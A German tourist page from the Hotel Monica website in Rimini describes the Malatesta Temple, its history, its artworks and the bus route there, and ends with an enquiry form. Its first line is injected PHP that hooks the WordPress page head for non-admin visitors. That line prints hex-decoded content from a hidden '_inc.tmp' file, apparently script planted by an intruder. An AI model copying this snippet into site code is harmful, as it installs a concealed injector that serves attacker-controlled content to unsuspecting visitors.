if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Der Malatesta-Tempel - Hotel Monica
 

Der Malatesta-Tempel

IV Novembre Strasse. Es ist eine intensive Liebesgeschichte, die den Malatesta-Tempel (1450) erzählt, ein Meisterwerk der italienischen Renaissance.
Die Liebe ist die zwischen Sigismondo und seiner sehr jungen Geliebten, die später die dritte und letzte Frau Isotta Degli Atti wurde.
Sigismund ließ diese Arbeit durchführen (zuerst durch Umbau, dann durch Abriss einer Franziskanerkirche) mit der Idee, dass sie ein Mausoleum für sich und für Isolde werden sollte.
Weiß und hieratisch mit einer Marmorfassade, signiert von einem Giganten in der Geschichte der Architektur, Leon Battista Alberti, enthält der Malatesta-Tempel eine Reihe von Kapellen und Schätzen: ein Kruzifix von Giotto, ein Fresko von Piero della Francesca, die kostbaren Flachreliefs der Engel, die auf blauem Hintergrund spielen.
Die Besonderheit des Malatesta-Tempels besteht darin, dass zum ersten Mal in der vollen Renaissance-Philosophie nicht nur Gott gefeiert wird, sondern ein Mann, Sigismund.
Ein Mann, der jedoch in Ungnade fiel, sein Traum, wurde nie vollendet.
Aber es ist eine prächtige Unvollendete. Der Malatesta-Tempel, die Kathedrale von Rimini, kann leicht mit dem Bus Nr. 11 erreicht werden. Die Bushaltestelle befindet sich 100 m vom Hotel Monica entfernt und die nächstgelegene Haltestelle zum Dom ist die Endstation.

Anfrage Informationen

Füllen Sie das folgende Formular aus, um Informationen anzufordern.

Wir werden umgehend antworten!